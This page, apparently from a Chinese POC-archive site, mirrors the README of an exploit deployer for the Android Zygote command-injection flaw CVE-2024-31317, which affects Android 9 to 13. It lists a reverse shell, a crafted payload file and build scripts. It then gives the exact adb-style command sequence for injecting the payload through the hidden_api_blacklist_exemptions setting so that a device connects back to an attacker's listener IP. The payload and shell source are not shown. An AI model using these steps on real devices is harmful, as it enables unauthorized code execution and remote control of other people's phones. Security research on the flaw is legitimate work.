POC详情: fda7edcdab00ef9f0868172a7cbc6c5a6ead6166

来源
关联漏洞
标题: Google Android 安全漏洞 (CVE-2024-31317)
描述:Google Android是美国谷歌(Google)公司的一套以Linux为基础的开源操作系统。 Google Android 存在安全漏洞,该漏洞源于 ZygoteProcess.java 文件的 multiple 方法存在不安全的反序列化,有可能通过 WRITE_SECURE_SETTINGS 以任何应用程序的身份实现代码执行。
介绍
# CVE-2024-31317-PoC-Deployer

![Android Version](https://img.shields.io/badge/Android-9%20to%2013-red)
![Patch Level](https://img.shields.io/badge/Patch%20Level-June%202024%2B-green)
![License](https://img.shields.io/badge/License-MIT-blue)

A deployment tool for CVE-2024-31317 proof-of-concept exploit targeting Android 9 through 13 devices.

## 📝 项目描述

CVE-2024-31317-PoC-Deployer 是一个自动化部署脚本,用于快速生成和配置 CVE-2024-31317 漏洞利用所需的全部文件。该漏洞影响 Android 9 到 13 的设备,允许通过 Zygote 进程实现权限提升并执行任意代码。

## 🚨 漏洞信息

- **CVE ID**: CVE-2024-31317
- **影响范围**: Android 9 到 Android 13
- **修复版本**: 2024年6月补丁级别及以后的Android版本
- **漏洞类型**: Zygote进程命令注入
- **所需权限**: WRITE_SECURE_SETTINGS

## 📦 包含文件

- `reverse_shell.c` - C语言实现的反向shell程序
- `payload.txt` - 特殊构造的漏洞利用payload
- `compile.sh` - 自动编译脚本
- `README.txt` - 详细使用说明
- `CVE-2024-31317.txt` - 漏洞技术分析文档

## 🛠️ 快速开始

1. **运行部署脚本**:
   ```bash
   ./deploy.sh
   ```

2. **编译反向shell**:
   ```bash
   ./compile.sh
   ```

3. **运行反向shell监听器**:
   ```bash
   ./reverse_shell
   ```

## 💣 漏洞利用步骤

1. 上传 `payload.txt` 到目标设备的 `/data/local/tmp/`
2. 替换 payload.txt 中的 `xxx.xxx.xxx` 为你的监听服务器IP
3. 在目标设备上执行以下命令序列:
   ```bash
   am force-stop com.android.settings
   cd /data/local/tmp/
   settings put global hidden_api_blacklist_exemptions "$(cat payload.txt)"
   am start -n com.android.settings/.Settings
   settings put global hidden_api_blacklist_exemptions "null"
   ```

## ⚠️ 免责声明

此工具仅用于合法的安全测试和研究目的。使用前必须获得目标系统的明确授权。未经授权的使用可能违反法律。开发者不对任何滥用行为负责。

## 📜 许可证

本项目采用 MIT 许可证 - 详情请参阅 [LICENSE](LICENSE) 文件。

## 📚 技术参考

- [Android Security Bulletin - June 2024](https://source.android.com/docs/security/bulletin)
- [CVE-2024-31317 Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31317)
文件快照

[4.0K] /data/pocs/fda7edcdab00ef9f0868172a7cbc6c5a6ead6166 ├── [ 12K] Android_Zygote_Research_Kit.sh ├── [1.0K] LICENSE ├── [ 13K] payload1213.txt └── [2.3K] README.md 0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。